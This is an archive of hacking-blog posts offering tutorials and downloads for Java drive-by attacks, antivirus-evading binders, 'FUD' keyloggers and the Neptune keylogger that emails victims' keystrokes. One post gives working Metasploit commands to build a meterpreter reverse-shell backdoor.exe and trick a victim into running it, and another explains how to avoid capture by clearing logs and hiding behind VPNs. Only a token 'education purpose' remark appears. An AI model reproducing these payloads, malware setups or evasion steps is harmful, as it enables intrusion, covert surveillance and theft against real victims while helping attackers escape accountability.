Showing posts with label keyloggers. Show all posts
Showing posts with label keyloggers. Show all posts

Thursday, December 27, 2012



Checkout  my previous tut about what is java drive and how to setup a java drive
Here is the tutorial how to  clone any webpage and turn into a javadrive:


Download required files from here

What is a Java drive ?

A Java Drive-By is a Java Applet that is coded in Java and is put on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be a virus or even a simple downloader. If you'd like to get the source code or wanna know more information about a Java Drive-By, use Google.


Here is a detailed video tutorial of java drive >>




Downlaod Java drive files from here
                                      Download keylogger from here

Monday, July 2, 2012


Watch video tut on youtube : http://adf.ly/AHnf3



Download link : http://adf.ly/AHoDC

Tuesday, June 19, 2012

                        


What is Binder?
Bridges the Gap between XML and Code (C++,C#,Java,VB6,VB.Net). Generates a class library based on an XML Schema (XSD, XDR or DTD). The resulting library makes it simple to read and write XML documents programmatically. Drastically cutting time spent developing and testing. Because the class library is strongly typed you can also make use of intelligence. The library forces compliance to the schema resulting in valid XML every time. Simple words it converts your code and forms into an executable program.
Why Hackers use Binder?
It�s simple. They bind the virus with another clean for example (.exe) to make the virus undetected to anti-virus software. Many binders has extra features like add bytes, change icons, etc. to make them more undetected. You can go to stuff page and download the binder to see how it�s work. Of course is detected from some anti-virus use it for education purpose.
How you can protect from a mask virus?
You can�t! Binders is usually detected very fast from good anti-virus software�s, when you open some binded virus your anti-virus software will probably show you (injection). If your anti-virus software is not detect the virus or the binder the only think you have to do is to confront it as a simple virus.


A good list of my binder collection Free download :

 3   nbinder
 4   sbinder

Saturday, April 14, 2012

Guyzz this is nt my tut but i wud like to share it coz its very important frall of us!!
Okay, let's begin!


1) How hackers get caught.

- First stuff that gives you away are "LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a �:wq� in /var/log/messages or binarys.

- Your laziness will take you into problems.
NEVER HACK FROM HOME! Take your time, and go to net cafe or anywhere else apart from home. Logs will take you down!

- The code that you run on system will take you down. If you compile the code on target, libraries will give you away!

- If your victm, notice, that he is maybe hacked, or something is wrong.. He will ask from his ISP for IP logs, and if you dont use VPN, or if you hack from home, they will hunt you down.

- Thing, that takes you down 100% is BRAGGING. It is common problem of beginning hackers. They like to brag, to earn respect and reputation but NOT KNOWING that is the matter of minutes, hours mby days when they will be caught.
*Don't use hotmail. CIA Owns it.


2) Hiding and Securing you as "Hacker"

- Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.

*A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.
*An older hacker, on the other hand, will rarely leave any tracks. They know how to use their slave's computers as a tool for a launching place to get into another computer.

There will always be hackers, and there will always be hackers in prison.

* DESTROY LOGS, REMOVE ALL YOUR TRACKS!

* DO NOT HACK AT HOME! USE VPN THAT SAVES NO LOGS!

HOW TO REMOVE YOUR SYSTEM LOGS:

Choose Start > Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select Clear All Events.
To save the current system log, click Yes when Windows returns the message, "Do you want to save 'System' before clearing it?", enter a file name for the saved system log file, and then click Save.


[size=xx-large]Virtual Private Network - VPN(Click on spoilers)[/size]
1) 
I will recommend you to use proXPN.
It is VPN that do not store logs.
proXPN: http://proxpn.com/download.php


ProXPN Windows installation:

(I used images from proXPN official website)



Click "Next"



Just click "Agree" here to continue installation.



Let the installer run until completion.



Just click the "Finish" button to complete the installation.



Welcome to the proXPN client. Click the "Don't have an account?" link to create a new account.



Enter your email address and the password of your choice. Then check the license agreement checkbox and click the "I agree - create account" button.



Click "OK" to finish the account signup process in the software client. 



Check your email for a greeting email from proXPN. In that email is a link which you will need to click in order to activate your free account. If it doesn't show up within a reasonable timeframe, make sure to check your spam folders. Once you've clicked the link in the email, your account should be active. Go ahead and click the "connect" button to connect to proXPN



Once you connect, the system tray icon will turn green. You're now surfing safe and secure, courtesy of proXPN.

And you are done with securing yourself.
Just to make sure, go check if you are truly anonimous 
http://www.ip-adress.com/Proxy_Checker/

READ THIS PLEASE: Before you start flaming and attacking me, i would like to tell you that i haven't searched for threads like this, and i know that maybe there are 1000 similar threads about this, but i wanted to make stuff simple and i will maybe help someone who reads this thread. So PLEASE, if you don't like this, don't comment at all. If you like this, say "Thanks this is good tutorial" etc.. And i would be happy. Thank you for listening me. MS 4 Life!

Sunday, February 19, 2012


In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which �provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework�


My Video tutorial on youtube :http://www.youtube.com/watch?v=GiofrKO-v8A





Commands used:
msfpayload windows/meterpreter/reverse_tcp LHOST=�your Local I LPORT=�listening port� x > /root/backdoor.exe


I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is xxx.xxx.xx.x.

After that, you should be able to see a file named as backdoor.exe in /root. 

Send the file to the victim by using your Social Engineering skills and let him 

click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.128.168.128
set lport 4444
exploit







If all goes well, you should be able to establish a meterpreter session. Typesysinfo to gather some info on the machine. To know other commands


 for the meterpreter type help. There are also other meterpreter commands 

like capturing the screenshot of the PC, record keystrokes, capture a 
snapshot from a webcam, etc. To enter the command shell of the machine, type shell.

it,s cool to take a screenshot with meterpreter command screenshot.

Sunday, December 18, 2011









My  video will be live at: http://youtu.be/AtMgFY3ddGo



How to make a keylogger FUD | How to bypass Antivirus detection 



Download Required Tools From HERE


Sunday, December 11, 2011

What are Keyloggers?
Using key logger utility you will be able to establish full control over your computer. You will also find out, what was going on your computer in your absence: what was run and typed etc which act as best children internet protection software. Using the keylogging program constantly, you can restore the previously typed text in case you have lost it. Keystroke logger software works in the hidden mode and invisible on Windows operating system including Windows 7/VISTA/XP/Server 2008/NT/98 etc.

Key logger features:
  • Key Stroke Recording
    Record all typed keystrokes by the users on computer!
  • Recording Multiple User Record
    Record all users activities performed on the computer (including the Guest user).
  • Hidden Installation
    Users can not detect about the key logger installation on the computer!
  • Stealth Mode
    Key Logger will not appear on the Desktop, Add/Remove Programs, Control panel and even hidden in installation path folders.
  • Record startup time and time settings of computer
    Facilitates user to record windows login time and system time modifications.
  • Email Log Files
    Software record the keystrokes in encrypted log file that can be sent later at specified email address.
  • Password Protected
    Password protected from the external users logging it!
  • Hot Key and Run command featureHotkey combination or run command can be assigned to unhide the software when running in hidden mode.
  • Report Generation
    Report of recorded keystrokes can be generated in .txt or .html file format according to user choice.
  • No Degradation of Performance
    Do not slow down the computer when the software is running.




Video tutorial For NEptune Keylogger Setup:






Watch it on youtube:http://youtu.be/H91kLXFq6X0









see this screen Shot Of Email of KEylogs :




When victim will click on infected file thenYou Will recieve LOgs after 20-25 minutes :) So keep patience





Download  Latest Version: v1.78

Project Neptune (1.7 MiB )